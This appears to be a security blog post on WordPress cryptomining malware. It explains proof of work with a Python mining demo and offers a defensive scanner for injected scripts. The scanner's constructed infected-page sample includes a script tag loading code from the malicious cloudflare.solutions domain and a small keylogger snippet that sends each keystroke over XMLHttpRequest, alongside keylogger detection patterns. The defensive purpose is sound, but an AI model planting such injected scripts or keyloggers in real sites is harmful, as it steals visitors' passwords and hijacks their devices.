Cryptomining malware is a new form of malware that uses the processing power of compromised servers, hosting accounts and visitors’ devices to generate cryptocurrencies like Bitcoin and Litecoin. Before a coin can be created, miners have to demonstrate “proof of work,” which in practice means repeatedly hashing candidate blocks until one meets a difficulty target. Legitimate miners buy powerful hardware to do that work; criminals use machines they have infected.
Over the last few weeks the value of cryptocurrencies, particularly Bitcoin, has increased quickly. By using compromised machines to generate coins, criminals create a digital asset that can be converted into hard currency. Because the value of cryptocurrencies is rising, we can expect to see more frequent and sophisticated attacks through 2018.
Cryptocurrencies are based on blockchain technology. A blockchain is a distributed ledger: a data structure that records transactions and is replicated, extended and verified by many independent network nodes. The ledger records transfers of coins between users, but also the creation of new coins. In a nutshell, to create a coin a miner has to prove to the network that they have performed a certain amount of computation, and any node can check that proof cheaply. Without proof of work, anyone could mint coins at will and individual coins wouldn’t be worth much.
In the early days of cryptocurrencies, creating coins was easy: they could be generated quickly on low-powered hardware. As more computing power joins a network, the difficulty target rises so that the amount of work per coin increases, and today serious miners use clusters of machines with powerful GPUs. The alternative to a few high-powered specialized machines is a very large number of low-powered ones, such as laptops and smartphones.
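To make the “prove you did the work” idea concrete, here is an added example (not code from the original article) of a minimal hash-based proof of work: a miner searches for a nonce that makes the SHA-256 of the block data start with a given number of zero bits, and a verifier checks the claim with a single hash. The `block_data` value and the difficulty levels used are constructed for the demo; raising the difficulty by one bit roughly doubles the expected number of attempts, which is the mechanism behind the rising cost described above.

```python
import hashlib
import itertools


def leading_zero_bits(digest: bytes) -> int:
    """Count how many leading bits of the digest are zero."""
    count = 0
    for byte in digest:
        if byte == 0:
            count += 8
            continue
        count += 8 - byte.bit_length()
        break
    return count


def block_hash(block_data: bytes, nonce: int) -> bytes:
    """Hash the block contents together with the nonce the miner is trying."""
    return hashlib.sha256(block_data + nonce.to_bytes(8, "big")).digest()


def mine(block_data: bytes, difficulty_bits: int) -> tuple[int, int]:
    """Search nonces until the hash meets the target.

    Returns (nonce, attempts). The search is the expensive part: on average
    it takes about 2**difficulty_bits hashes to find a valid nonce.
    """
    for nonce in itertools.count():
        if leading_zero_bits(block_hash(block_data, nonce)) >= difficulty_bits:
            return nonce, nonce + 1
    raise AssertionError("unreachable: itertools.count() never ends")


def verify(block_data: bytes, nonce: int, difficulty_bits: int) -> bool:
    """Verification is one hash, regardless of how long mining took."""
    return leading_zero_bits(block_hash(block_data, nonce)) >= difficulty_bits


def expected_attempts(difficulty_bits: int) -> int:
    """Average number of hashes needed at a given difficulty."""
    return 2 ** difficulty_bits


def demo(block_data: bytes = b"constructed block: alice pays bob 1 coin") -> dict[int, int]:
    """Mine the same block at increasing difficulty and return attempts per level."""
    results = {}
    for bits in (8, 12, 16):
        nonce, attempts = demo_results = mine(block_data, bits)
        assert verify(block_data, nonce, bits)
        results[bits] = attempts
        print(f"difficulty={bits:2d} bits  nonce={nonce:8d}  attempts={attempts:8d}  "
              f"expected~{expected_attempts(bits)}")
    return results


if __name__ == "__main__":
    demo()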
Cryptomining malware, whether code injected into websites through known vulnerabilities or bundled with pirated themes and plugins, lets its authors run the proof-of-work calculations on large networks of compromised machines and their visitors’ browsers, generating coins with minimal investment.
One of the most widespread pieces of cryptomining malware on WordPress sites is known as cloudflare.solutions, after the domain it loads from; it has nothing to do with the real Cloudflare. Discovered earlier this year, it injects JavaScript into the site’s pages that pulls in-browser mining code from that domain. When a visitor opens a page on a compromised site, the script runs in their browser and uses the device’s processor to perform mining operations. Hijacking the processor degrades browser and device performance and drains the battery.
In an unpleasant twist, cloudflare.solutions has recently been modified to include a keylogger that captures text typed into WordPress form fields, including password fields on the login form, and sends it to the criminals’ servers.
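The two behaviours just described, an external script loaded from the fake-Cloudflare domain and an inline script that hooks keystrokes and ships them off-site, both leave traces in the HTML a site serves. Below is an added example (not code from the article or from any WordPress project) of a small scanner that pulls the `<script>` tags out of a rendered page and flags three things: scripts loaded from a host you did not put on your allowlist, anything referencing the `cloudflare.solutions` domain named above, and inline scripts that both listen for key events and make network calls. The sample page, the allowlisted hosts and the script path under `cloudflare.solutions` are constructed for the demo, not taken from a real infection.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this particular site legitimately loads scripts from.
ALLOWED_HOSTS = {"example-blog.test", "ajax.googleapis.com"}
# Domain named in the article; nothing served from it belongs on your site.
KNOWN_BAD_HOSTS = {"cloudflare.solutions"}

# Heuristics for an in-page keylogger: hooks keyboard events AND sends data out.
KEY_HOOK = re.compile(r"addEventListener\(\s*['\"]key(?:down|up|press)['\"]|onkey(?:down|up|press)\s*=", re.I)
NETWORK_CALL = re.compile(r"\bXMLHttpRequest\b|\bfetch\s*\(|\bWebSocket\s*\(|\bsendBeacon\s*\(", re.I)


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self) -> None:
        super().__init__()
        self.external: list[str] = []
        self.inline: list[str] = []
        self._in_script = False
        self._buf: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def scan_html(page: str) -> list[str]:
    """Return a list of human-readable findings; empty means nothing suspicious."""
    parser = ScriptCollector()
    parser.feed(page)
    findings = []
    for src in parser.external:
        host = urlparse(src).netloc.lower().split(":")[0]
        if not host:
            continue  # relative URL, served from the site itself
        if host in KNOWN_BAD_HOSTS:
            findings.append(f"known-bad script host {host}: {src}")
        elif host not in ALLOWED_HOSTS:
            findings.append(f"script from non-allowlisted host {host}: {src}")
    for body in parser.inline:
        if any(bad in body for bad in KNOWN_BAD_HOSTS):
            findings.append("inline script references a known-bad host")
        if KEY_HOOK.search(body) and NETWORK_CALL.search(body):
            findings.append("inline script hooks keystrokes and makes network calls (possible keylogger)")
    return findings


# Constructed sample of a compromised page; the path under cloudflare.solutions is made up.
INFECTED_PAGE = """<html><head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
<script src="/wp-includes/js/wp-embed.min.js"></script>
<script src="//cloudflare.solutions/example/injected-loader.js"></script>
<script>
document.addEventListener('keydown', function(e){ var x = new XMLHttpRequest(); x.open('POST', '/x'); x.send(e.key); });
</script>
</head><body><form><input type="password" name="pwd"></form></body></html>"""

CLEAN_PAGE = """<html><head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
<script>document.getElementById('menu');</script>
</head><body></body></html>"""

if __name__ == "__main__":
    for name, page in (("infected", INFECTED_PAGE), ("clean", CLEAN_PAGE)):
        print(f"{name}: {scan_html(page) or 'no findings'}")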
It should be mentioned that some “legitimate” publishers are taking advantage of cryptomining to generate revenue for their sites. I’ll avoid debating the ethics here, but it’s undeniable that a large number of cryptomining scripts found on the web are the result of exploited sites and are funneling money to criminal organizations.
The best way to avoid being infected by cryptomining malware is to follow standard WordPress security best practices: use two-factor authentication, keep WordPress core, themes and plugins updated as new versions are released, install themes and plugins only from trusted sources (never pirated copies), remove anything you no longer use, and periodically check the pages your site serves for scripts you did not add.